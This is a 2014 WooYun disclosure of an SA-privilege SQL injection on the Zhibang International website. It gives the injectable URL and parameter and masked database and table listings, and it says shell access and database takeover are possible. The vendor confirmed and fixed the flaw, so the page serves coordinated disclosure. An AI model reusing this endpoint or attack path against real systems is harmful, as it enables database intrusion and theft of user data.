当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-039776

漏洞标题:智邦国际官网主站SA权限SQL注入漏洞

相关厂商:北京智邦国际软件技术有限公司

漏洞作者: 爱上襄阳

提交时间:2014-09-09 19:20

修复时间:2014-10-24 19:22

公开时间:2014-10-24 19:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:17

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-09: 细节已通知厂商并且等待厂商处理中
2014-09-10: 厂商已经确认,细节仅向厂商公开
2014-09-20: 细节向核心白帽子及相关领域专家公开
2014-09-30: 细节向普通白帽子公开
2014-10-10: 细节向实习白帽子公开
2014-10-24: 细节向公众公开

简要描述:

智邦ERP官网主站SA权限SQL注入漏洞

详细说明:

注入点,SA权限,跨库
威胁:
1、若暴到物理路径能直接getshell
2、跑到了SA密码,同时外网还开了1433端口,若解密出来,也直接对数据库进行操作。
3、读到了表不少·看里面有订单,用户信息。

2013-10-15 11-17-05.png


http://www.zbintel.com/knowledge/knowledge_2.asp?A2=17
retrieved: SA
current user: 'SA'
available databases [11]:
[*] BA***k
[*] c***
[*] master
[*] m***l
[*] M***s
[*] m***
[*] N***d
[*] p***s
[*] te***b
[*] w***k
[*] zbi***lp
atabase: work
[418 tables]
+------------------------------+
| dbo.G***on |
| dbo.M_***ig |
| dbo.M***on |
| dbo.Me***ss |
| dbo.Me***v |
| dbo.S***ion |
| dbo.S***Log |
| dbo.[email_Send_Queue_错误] |
| dbo.[email_book_zh_非杂志] |
| dbo.a***_zt |
| dbo.a_***t |
| dbo.a***s |
| dbo.ac*** |
| dbo.ac***l |
| dbo.ac***c |
| dbo.ac***t |
| dbo.ac***ht |
| dbo.ac***lt |
| dbo.ac***l |
| dbo.ac***zl_all |
| dbo.ac***_wc |
| dbo.ac***d |
| dbo.ac***te |
| dbo.ac***l |
| dbo.a*** |
| dbo.a*** |
| dbo.al***d |
| dbo.ar***st |
| dbo.au***st |
| dbo.a***d |
| dbo.b*** |
| dbo.b***n |
| dbo.b***ve |
| dbo.***s |
| dbo.b***son |
| dbo.b***y |
| dbo.b***ply2 |
| dbo.c*** |
| dbo.ca***e |
| dbo.c***et |
| dbo.c*** |
| dbo.ch*** |
| dbo.***|
|

漏洞证明:

retrieved: SA
current user: 'SA'
available databases [11]:
[*] BA***k
[*] c***
[*] master
[*] m***l
[*] M***s
[*] m***
[*] N***d
[*] p***s
[*] te***b
[*] w***k
[*] zbi***lp

修复方案:

过滤

版权声明:转载请注明来源 爱上襄阳@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2014-09-10 16:51

厂商回复:

厂商已处理

最新状态:

暂无